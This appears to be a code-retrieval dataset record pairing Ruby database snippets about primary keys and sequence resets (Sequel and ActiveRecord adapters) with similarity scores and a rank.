"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def next_for(table)\n table = table.respond_to?(:table_name) ? table.table_name : table.to_s\n next_id :table => table\n end",
"def table_id\n\n end",
"def pkey_selection(table = nil)\n prefix = table ? \"#{table}.\" : \"\"\n \"#{primary_key.map { |k| \"#{prefix}`#{k}` AS '#{k}'\" }.join(', ')}\"\n end",
"def last_insert_id(sequence_name)\n r = exec_query(\"SELECT currval('#{sequence_name}')\", 'SQL')\n Integer(r.rows.first.first)\n end",
"def full_primary_key(klass)\n \"#{klass.quoted_table_name}.#{klass.quoted_primary_key}\"\n end",
"def default\n by_id(default_id)\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def primary_key\n @primary_key\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key_to_uuid(table, options = {})\n default = options[:default] || 'gen_random_uuid()'\n seed = options[:seed]\n\n column = connection.primary_key(table)\n\n execute %Q{ALTER TABLE #{table}\n ALTER COLUMN #{column} DROP DEFAULT,\n ALTER COLUMN #{column} SET DATA TYPE UUID USING (#{to_uuid_pg(column, seed)}),\n ALTER COLUMN #{column} SET DEFAULT #{default}}\n\n execute %Q{DROP SEQUENCE IF EXISTS #{table}_#{column}_seq} rescue nil\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def reset_sequence_value(name, next_value = nil)\n create_sequence(name)\n unless next_value\n table, field = name.split('_$_')\n next_value = self.select_rows('SELECT MAX(%s) as max FROM %s' % [field, table]).first.first.to_i + 1\n end\n self.execute(\"ALTER TABLE %s_sequence AUTO_INCREMENT = %s\" % [name, next_value || 1])\n end",
"def primary_key\n 'id'\n end",
"def sequence_id\n object.sequence._id.to_s\n end",
"def column_default(key)\n self.class.column_default(key)\n end",
"def default_key\n :\"#{self[:name]}_id\"\n end",
"def find_primary_key(table)\n query = %q{\n SELECT column_name\n FROM information_schema.table_constraints tc\n INNER JOIN\n information_schema.key_column_usage kcu\n ON tc.constraint_name = kcu.constraint_name\n WHERE constraint_type = 'PRIMARY KEY'\n AND tc.table_catalog = 'reaktor'\n AND tc.table_schema = 'public'\n AND tc.table_name = ?\n ORDER BY ordinal_position;\n }\n\n sth = $dbh_pg.prepare(query)\n begin\n sth.execute(table.to_s)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not find primary key. Message: #{$!}. query: #{get_query_string(sth)}\")\n raise\n exit\n end\n pk = []\n while row = sth.fetch\n pk << row[0]\n end\n return pk\nend",
"def default_key\n :\"#{self[:name]}_id\"\n end",
"def simple_id\n \"_#{@table.id}_#{@id}\"\n end",
"def primary_key\n case primary_key_prefix_type\n when :table_name\n Inflector.foreign_key(class_name_of_active_record_descendant(self), false)\n when :table_name_with_underscore\n Inflector.foreign_key(class_name_of_active_record_descendant(self))\n else\n \"id\"\n end\n end",
"def get_id\n default_id = self.class.to_s.split('::').last\n default_id[0] = default_id[0].downcase\n return default_id\n end",
"def next_val_sequence(name)\n if self.class.to_s =~ /ActiveRecord::ConnectionAdapters::Mysql/\n self.insert_sql(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n else\n # the default insert_sql is nonsense, but jdbc_mysql doesn't override it\n self.execute(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n end\n end",
"def identifier_value\n DEFAULT_QUESTIONNAIRE_ID\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def default_sid\n oratab = OraUtils::OraTab.new\n oratab.default_sid\n rescue\n ''\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def default_key\n :\"#{self[:model].name.to_s.demodulize.underscore}_id\"\n end",
"def default_key\n :\"#{underscore(demodulize(self[:model].name))}_id\"\n end",
"def to_param\n sequence_no\n end",
"def next_sequence_value(sequence_name)\n @connection.query(\"SELECT NEXT VALUE FOR #{sequence_name} FROM RDB$DATABASE\")[0][0]\n end",
"def primary_key\n self[:primary_key] ||= associated_class.primary_key\n end",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def primary_key\n select(&:primary_key?)\n end"
] |
[
"0.8170994",
"0.81505257",
"0.8027529",
"0.7910902",
"0.78652835",
"0.78608876",
"0.78294235",
"0.74895513",
"0.7457443",
"0.7406263",
"0.7299918",
"0.7291324",
"0.72609276",
"0.72075987",
"0.7121409",
"0.70861423",
"0.7080454",
"0.69758296",
"0.6911338",
"0.680072",
"0.6795771",
"0.66242427",
"0.65517443",
"0.6522507",
"0.6471901",
"0.64188516",
"0.6371983",
"0.6371983",
"0.6355501",
"0.62790275",
"0.6204521",
"0.6160675",
"0.6066816",
"0.6061855",
"0.6061855",
"0.6057503",
"0.6039172",
"0.6031963",
"0.60282445",
"0.60242283",
"0.60086197",
"0.59984404",
"0.59958756",
"0.5961279",
"0.5947062",
"0.59455574",
"0.592126",
"0.58974195",
"0.58891547",
"0.58805203",
"0.58618593",
"0.58521354",
"0.5848536",
"0.5843924",
"0.58196473",
"0.5818348",
"0.5812072",
"0.5762068",
"0.57471704",
"0.5741498",
"0.5741498",
"0.5741498",
"0.5733901",
"0.5716411",
"0.57007575",
"0.5638035",
"0.5616776",
"0.56089485",
"0.56068057",
"0.5601467",
"0.55973285",
"0.5577493",
"0.5575126",
"0.55641216",
"0.55641216",
"0.5559974",
"0.55498004",
"0.55498004",
"0.5547278",
"0.55378187",
"0.55370325",
"0.5518114",
"0.5507541",
"0.54624885",
"0.54524535",
"0.5450779",
"0.54501575",
"0.5443172",
"0.54430574",
"0.5440272",
"0.5419304",
"0.5418631",
"0.5408548",
"0.5406169",
"0.54008734",
"0.5378645",
"0.5375252",
"0.53748524",
"0.5373012",
"0.53669703"
] |
0.7384305
|
10
|
Refresh the materialized view with the given name. DB.refresh_view(:items_view) REFRESH MATERIALIZED VIEW items_view DB.refresh_view(:items_view, concurrently: true) REFRESH MATERIALIZED VIEW CONCURRENTLY items_view
|
def refresh_view(name, opts=OPTS)
run "REFRESH MATERIALIZED VIEW#{' CONCURRENTLY' if opts[:concurrently]} #{quote_schema_table(name)}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def refresh_materialized_view(name, options = {})\n options = {\n :with_data => true\n }.merge(options)\n\n sql = \"REFRESH MATERIALIZED VIEW #{quote_view_name(name)}\"\n sql << \" WITH NO DATA\" unless options[:with_data]\n\n execute \"#{sql};\"\n end",
"def refresh_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::RefreshView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n sql = \"REFRESH MATERIALIZED VIEW #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def refresh_views\n database.views.each do |name, view|\n materialize(view)\n end\n end",
"def refresh_later(options = {})\n MaterializedViewRefreshWorker.perform_async(name, options)\n end",
"def refresh\r\n @view.refresh\r\n end",
"def refresh\n Vedeu.trigger(:_refresh_view_, current)\n\n Vedeu.trigger(:_refresh_cursor_, current)\n end",
"def materialize_view(name, sql)\n unless @enduser\n raise Empire::MissingEnduserError.new\n end\n path = \"view/#{name}\"\n data = {'query' => sql}\n request path, :put, {}, data\n end",
"def by_name\n Vedeu.log(type: :cursor,\n message: \"Refreshing cursor: (#{cursor.inspect})\")\n\n render\n\n Vedeu.trigger(:_refresh_view_content_, name) if refresh_view?\n end",
"def materialize(view)\n logger.info \"Materializing the view '#{view.name}'\" if logger\n view.materialize(database.document_store) if view.materialized?\n logger.info \"The view '#{view.name}' is now materialized\" if logger\n end",
"def each_materialized_view(&block)\n if block_given?\n @materialized_views.each(&block)\n self\n else\n @materialized_views.freeze\n end\n end",
"def rename_materialized_view(name, new_name, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :rename_to => new_name\n }, options).to_sql\n end",
"def reload! view: nil\n view ||= :SCHEMA_VIEW\n @grpc = service.get_table instance_id, name, view: view\n @loaded_views = Set[view]\n self\n end",
"def refresh\n Vedeu.trigger(:_refresh_, current)\n end",
"def view name, query={}, &block\n unless design_doc_fresh\n refresh_design_doc\n end\n query[:raw] = true if query[:reduce] \n raw = query.delete(:raw)\n view_name = \"#{design_doc_slug}/#{name}\"\n fetch_view_with_docs(view_name, query, raw, &block)\n end",
"def materialized_views(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def refresh\n Vedeu.trigger(\"_refresh_#{current}_\".to_sym)\n end",
"def reload! view: nil\n ensure_service!\n @view = view || @view\n @grpc = service.get_schema name, @view\n @reference = nil\n @exists = nil\n self\n end",
"def recreate_view name\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n if view_structure\n execute \"DROP VIEW IF EXISTS #{name}\"\n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end\n end",
"def refresh_v1\n V1_REPORTING_VIEWS.each do |name|\n benchmark_and_statsd(name) do\n klass = name.constantize\n klass.refresh\n end\n end\n end",
"def test_materialized_view_metadata_updates\n skip(\"Materialized views were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.test (pk int PRIMARY KEY, c int)\")\n @session.execute(\"CREATE MATERIALIZED VIEW simplex.mv1 AS SELECT c,pk FROM simplex.test WHERE c IS NOT NULL AND pk IS NOT NULL PRIMARY KEY (pk, c)\")\n\n @listener.wait_for_materialized_view('simplex', 'mv1')\n\n assert @cluster.keyspace('simplex').has_materialized_view?('mv1')\n mv_meta = @cluster.keyspace('simplex').materialized_view('mv1')\n assert_equal 'SizeTieredCompactionStrategy', mv_meta.options.compaction_strategy.class_name\n\n @session.execute(\"ALTER MATERIALIZED VIEW simplex.mv1 WITH compaction = { 'class' : 'LeveledCompactionStrategy' }\")\n @cluster.refresh_schema\n mv_meta = @cluster.keyspace('simplex').materialized_view('mv1')\n assert_equal 'LeveledCompactionStrategy', mv_meta.options.compaction_strategy.class_name\n end",
"def refresh\n do_refresh\n end",
"def refresh\n do_refresh\n end",
"def do_query_view(view_name, view_options)\n database.view \"#{self.name.underscore}/#{view_name}\", view_options\n end",
"def refresh\n do_refresh\n self\n end",
"def refresh_view(view)\n notify_observers :refreshing_view, view.controller, self, view\n view.configure\n view.proxy.refresh\n @configured = true\n end",
"def cluster_materialized_view(name, index_name)\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :cluster_on => index_name\n }).to_sql\n end",
"def drop_materialized_view(name, **kwargs)\n supports_materialized_view!\n\n execute build_drop_materialized_view_query(name, **kwargs)\n end",
"def all\n Vedeu.timer('Refreshing all'.freeze) do\n Vedeu.interfaces.zindexed.each do |interface|\n Vedeu.trigger(:_refresh_view_, interface.name)\n end\n end\n end",
"def by_name\n refresh_view if refresh_view?\n\n cursor.render\n end",
"def refresh(*args)\n alloc(*args).refresh\n end",
"def reload\n @view = nil\n end",
"def refresh\n # FIXME\n end",
"def refresh\n store\n\n render\n\n self\n end",
"def update_views\n gauges_config = YAML.load_file(\"#{CACHE_DIR_PATH}/config\")\n views = load_views\n last_run = gauges_config[:last_run] || gauges_config[:signup_date]\n yesterday = Date.today - 1\n\n if last_run.nil?\n views = fetch_views(views, yesterday, gauges_config[:token])\n elsif last_run && last_run != Date.today\n for date in last_run..yesterday do\n views = fetch_views(views, date, gauges_config[:token])\n end\n end\n\n cache_views(views)\n update_last_run(gauges_config)\n end",
"def refresh\n @server.make_json_request('show.refresh', tvdbid: @tvdbid)['message']\n end",
"def view(name)\n new_view = view_old(name)\n new_view.table_name = name\n new_view\n end",
"def RedrawAllViews(arg0 = nil)\n ret = _invoke(1610743947, [arg0], [VT_DISPATCH])\n @lastargs = WIN32OLE::ARGV\n ret\n end",
"def update_view name, type, columns, options={}\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n raise ViewNotExistException(\"View #{name} does not exist in current db\") unless view_structure\n \n columns_str = columns.is_a?(Array) ? columns.join(',') : columns\n \n select_pattern = /select (.*) from/i\n select_str = view_structure[select_pattern,1]\n\n case type\n when :add\n view_structure.gsub!(select_pattern, \"SELECT #{select_str}, #{columns_str} FROM\")\n when :remove\n select_str.gsub!(\", #{columns_str}\", '')\n view_structure.gsub!(select_pattern, \"SELECT #{select_str} FROM\")\n when :replace\n view_structure.gsub!(select_pattern, \"SELECT #{columns_str} FROM\")\n end\n\n drop_views name, options[:dependent_views] \n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end",
"def refresh\n end",
"def refresh\n send_cmd \"refresh\"\n nil\n end",
"def materialized_view_definition(matview_name, name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; end",
"def refresh!(*args)\n alloc(*args).refresh!\n end",
"def alter_materialized_view_reset_options(name, *args)\n options = args.extract_options!\n\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :reset_options => args\n }, options).to_sql\n end",
"def test_materialized_view_metadata_drop\n skip(\"Materialized views were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.test (pk int PRIMARY KEY, c int)\")\n @session.execute(\"CREATE MATERIALIZED VIEW simplex.mv1 AS SELECT c,pk FROM simplex.test WHERE c IS NOT NULL AND pk IS NOT NULL PRIMARY KEY (pk, c)\")\n\n @listener.wait_for_materialized_view('simplex', 'mv1')\n assert @cluster.keyspace('simplex').has_materialized_view?('mv1')\n\n @session.execute(\"DROP MATERIALIZED VIEW simplex.mv1\")\n @cluster.refresh_schema\n refute @cluster.keyspace('simplex').has_materialized_view?('mv1')\n end",
"def refresh\n end",
"def refresh\n end",
"def refresh\r\n command 'refresh'\r\n end",
"def refresh\r\n command 'refresh'\r\n end",
"def reload\n refresh\n end",
"def reload\n refresh\n end",
"def refresh\n self.operation = \"#{operation}#refresh\"\n\n return if params_missing?\n\n # Connection settings\n set_connection_data!\n logger.info_ext(operation, \"Connection set successfully\")\n\n # Get all tasks\n tasks, @refresh_state_uuid = {}, SecureRandom.uuid\n @parts_requested_cnt, @parts_received_cnt = Concurrent::AtomicFixnum.new(0), Concurrent::AtomicFixnum.new(0)\n @source_refs_requested, @source_refs_received = [], Concurrent::Array.new\n\n params.to_a.each do |task|\n if task['task_id'].blank? || task['source_ref'].blank?\n logger.warn_ext(operation, \"Missing data for task: #{task}\")\n next\n end\n tasks[task['task_id']] = task['source_ref']\n\n if tasks.length == REFS_PER_REQUEST_LIMIT\n refresh_part(tasks)\n tasks = {}\n end\n end\n\n refresh_part(tasks) unless tasks.empty?\n\n archive_not_received_service_instances unless on_premise?\n rescue => err\n metrics_err_type = on_premise? ? :receptor : :cloud unless endpoint.nil?\n metrics&.record_error(metrics_err_type || :general)\n logger.error_ext(operation, \"Error: #{err.message}\\n#{err.backtrace.join(\"\\n\")}\")\n end",
"def supports_materialized_views?\n false\n end",
"def refresh\r\n end",
"def perform_reload\n api.stack_plan_reload(self)\n end",
"def alter_materialized_view_schema(name, schema, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_schema => schema\n }, options).to_sql\n end",
"def refresh\n update_databases()\n render json: {message: \"Information will be updated shortly\"}, status: :ok\n end",
"def refresh!\n refresh\n @window.refresh\n end",
"def each_materialized_view(&block)\n if block_given?\n @views.each_value do |v|\n yield(v) if v.base_table\n end\n self\n else\n result = []\n @views.each_value do |v|\n result << v if v.base_table\n end\n result\n end\n end",
"def remove_cluster_from_materialized_view(name)\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :remove_cluster => true\n }).to_sql\n end",
"def refresh\n @window.refresh\n end",
"def refresh; end",
"def refresh_index\n attributes = {}\n attributes[:collection_id] = @collection.id\n attributes[:user_id] = current_user.id\n RefreshCollectionResourcesJob.perform_later(attributes)\n # to perform directly (without worker) uncomment below and comment above\n # @collection.refresh_index(user_id: current_user.id)\n redirect_to [:admin, @collection, Resource], notice: 'Resource Index Update Job Successfully Started'\n end",
"def create_materialized_view(name, body = nil, force: false, **kwargs, &block)\n supports_materialized_view!\n\n drop_materialized_view(name) if force && table_exists?(name)\n\n execute build_create_materialized_view_query(name, body, **kwargs, &block)\n end",
"def refresh; schedule_update end",
"def recall_map_view\n get :map_view\n end",
"def refresh_index\n Elastic::Rebound.client.refresh({:index => @index_name})\n end",
"def process\n @type = 'refresh'\n full_analysis\n end",
"def refresh\n load if changed?\n end",
"def refresh()\r\n Fiber.yield\r\n end",
"def refresh()\r\n Fiber.yield\r\n end",
"def refresh\n if address.resolve(current_actor)\n begin\n @refreshed_at = Time.now\n if synchronize.value(refresh_timeout)\n cluster.handle_refresh(current_actor)\n else\n down\n end\n rescue Timeout::Error\n down\n end\n end\n end",
"def group_reload\n\t\tRails.application.load_seed \n\t\t@items = Item.all\n\t\trender 'index'\n\tend",
"def drop_materialized_view(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP MATERIALIZED VIEW '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |v| quote_view_name(v) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def alter_materialized_view_set_options(name, set_options, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_options => set_options\n }, options).to_sql\n end",
"def refresh!; end",
"def views(name = nil)\n select_values(\"SELECT table_name FROM information_schema.views\", name)\n end",
"def do_refresh(recurse=true)\n Thread.new do\n file_tree_mutex.synchronize do\n @tree.refresh\n @tree.model.refilter\n @tree.expand_first_row\n end\n end\n end",
"def view_materialized_at(name)\n status = view_status(name)\n Date.parse(status['materializedAt']) rescue nil\n end",
"def refresh\n\t\t@frame.updateGrid\n\t\tself.update\n\t\treturn self\n\tend",
"def view(name = \"\", viewpoint: :total, elements: :all, relationships: :for_elements)\n dia = __model.diagrams.find { |diagram| diagram.name == name }\n __model.remove_reference(dia) if dia\n __model.diagrams << View.new(__model, name, dia&.id, viewpoint, elements, relationships).render\n end",
"def generic_view(view_name, find_function, reduce_function = nil, options = {})\n return_json = options.delete(:return_json)\n order = options.delete(:order) || default_sort_order\n readonly = options.delete(:readonly)\n \n if options.delete(:view_type) == :slow\n result = query_slow_view(find_function, reduce_function, options)\n else\n result = query_view(view_name, find_function, reduce_function, options)\n end\n \n if return_json\n result\n else\n instantiate_instances(result, readonly, order)\n end\n end",
"def reload\n clear_memoizations!\n perform_reload\n self\n end",
"def refresh\n raise NotImplementedError.new('I do not know how to refresh myself, please implement it in subclass.')\n end",
"def refresh!\n load if changed?\n end",
"def view(name, &block)\n @views[name] = block\n end",
"def reload_data\n reset_collection_data\n reload_collection_data\n end",
"def mrender(name, options={ layout: false })\n render_options = { views: settings.multi_tenant_views }.merge(options)\n erb name, render_options\n end",
"def refresh\n render :partial => 'scheduler/user_course_list', :layout => false\n end",
"def refresh\n @mtus = nil\n end",
"def refresh_task_table\n @task_table.refresh(@download_manager, @resolver_manager)\n end",
"def refresh\n\t\t\treturn if completed?\n\t\t\t_runner.refresh\n\t\tend",
"def refresh!\n raise NotImplementedError, \"#refresh! is not implemented on #{@provider}:#{@type}\"\n end",
"def view_query(design_document_name, view_name, options = Options::View::DEFAULT)\n resp = @backend.document_view(@name, design_document_name, view_name, options.namespace, options.to_backend)\n ViewResult.new do |res|\n res.meta_data = ViewMetaData.new do |meta|\n meta.total_rows = resp[:meta][:total_rows]\n meta.debug_info = resp[:meta][:debug_info]\n end\n res.rows = resp[:rows].map do |entry|\n ViewRow.new do |row|\n row.id = entry[:id] if entry.key?(:id)\n row.key = JSON.parse(entry[:key])\n row.value = JSON.parse(entry[:value])\n end\n end\n end\n end",
"def reload\n\t\tself.request( :reload )\n\tend",
"def index\n self.refresh if params[:refresh]\n respond_to do |format|\n format.html\n format.json { render json: RapportsDatatable.new(view_context) }\n end\n end",
"def view(name, &block)\n API::Composition.build { view(name, &block) }\n end",
"def refresh!\n records true\n self\n end",
"def reload!\n callsite = Callsites[@callsite_key]\n rows_hash = rows_by_key(callsite.primary_key)\n sql = callsite.reload_sql(rows_hash.keys, @fetched_columns)\n new_rows = callsite.connection.send(:select, sql, \"#{callsite.model_class_name} Reload SlimScrooged\")\n new_rows.each do |row|\n if old_row = rows_hash[row[callsite.primary_key]]\n old_row.result_set = nil\n old_row.monitored_columns.merge!(row)\n end\n end\n end",
"def refresh\n session.cluster.refresh\n rescue => e\n raise ConnectionFailed, e\n end",
"def execute\n #log_on_error do\n synchronise_viewmodel_with_controller\n action.call\n refresh_view unless asynchronous?\n #end if can_execute?\n end"
] |
[
"0.7993562",
"0.7882737",
"0.75135463",
"0.7201716",
"0.6636582",
"0.643207",
"0.6383927",
"0.6365476",
"0.6278349",
"0.610675",
"0.60786706",
"0.6030206",
"0.59427327",
"0.58854914",
"0.58234787",
"0.5808679",
"0.5808097",
"0.5795441",
"0.5790887",
"0.5762876",
"0.5745043",
"0.5745043",
"0.57378817",
"0.5649664",
"0.56081915",
"0.5574537",
"0.55424905",
"0.55151147",
"0.55043393",
"0.54438114",
"0.5409293",
"0.53662443",
"0.5355622",
"0.5338812",
"0.532208",
"0.5300509",
"0.5289734",
"0.5280354",
"0.525992",
"0.52188426",
"0.5215091",
"0.5205275",
"0.51893514",
"0.5183296",
"0.51770526",
"0.51770526",
"0.5136274",
"0.5136274",
"0.51165974",
"0.51165974",
"0.51052994",
"0.5097711",
"0.50848025",
"0.5064953",
"0.5062602",
"0.5028481",
"0.50272894",
"0.50262624",
"0.49983534",
"0.4989587",
"0.49798235",
"0.49701354",
"0.49659824",
"0.49605227",
"0.49569884",
"0.49516892",
"0.49507922",
"0.49347454",
"0.4923314",
"0.4923314",
"0.49191186",
"0.4893518",
"0.48883593",
"0.4882581",
"0.48735765",
"0.48690498",
"0.48673242",
"0.48668763",
"0.48422128",
"0.48420975",
"0.4836561",
"0.48287153",
"0.48224863",
"0.4803017",
"0.47791588",
"0.47675723",
"0.4757284",
"0.475516",
"0.47405723",
"0.47396147",
"0.47372442",
"0.47273585",
"0.47235304",
"0.47170863",
"0.47147524",
"0.47119644",
"0.47110978",
"0.47016707",
"0.46944538",
"0.46927088"
] |
0.8195975
|
0
|
Reset the primary key sequence for the given table, basing it on the maximum current value of the table's primary key.
|
def reset_primary_key_sequence(table)
return unless seq = primary_key_sequence(table)
pk = SQL::Identifier.new(primary_key(table))
db = self
s, t = schema_and_table(table)
table = Sequel.qualify(s, t) if s
if server_version >= 100000
seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))
increment_by = :seqincrement
min_value = :seqmin
# :nocov:
else
seq_ds = metadata_dataset.from(LiteralString.new(seq))
increment_by = :increment_by
min_value = :min_value
# :nocov:
end
get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_sequence!(table, column, sequence = nil)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{default_sequence_name(table, column)} restart with #{max_id}\") unless legacy_mode\n execute(\"SET GENERATOR #{default_sequence_name(table, column)} TO #{max_id}\") if legacy_mode\n end",
"def reset_sequence!(table, column, sequence = nil)\n mpk = select_value(\"SELECT MAX(#{quote_column_name(column)}) FROM #{quote_table_name(table)}\")\n execute(\"ALTER TABLE #{quote_table_name(table)} ALTER COLUMN #{quote_column_name(column)} RESTART WITH #{mpk.to_i + 1}\")\n end",
"def reset_sequence!(table, column, sequence = nil)\n sequence ||= default_sequence_name(table, column)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{sequence} restart with #{max_id}\")\n end",
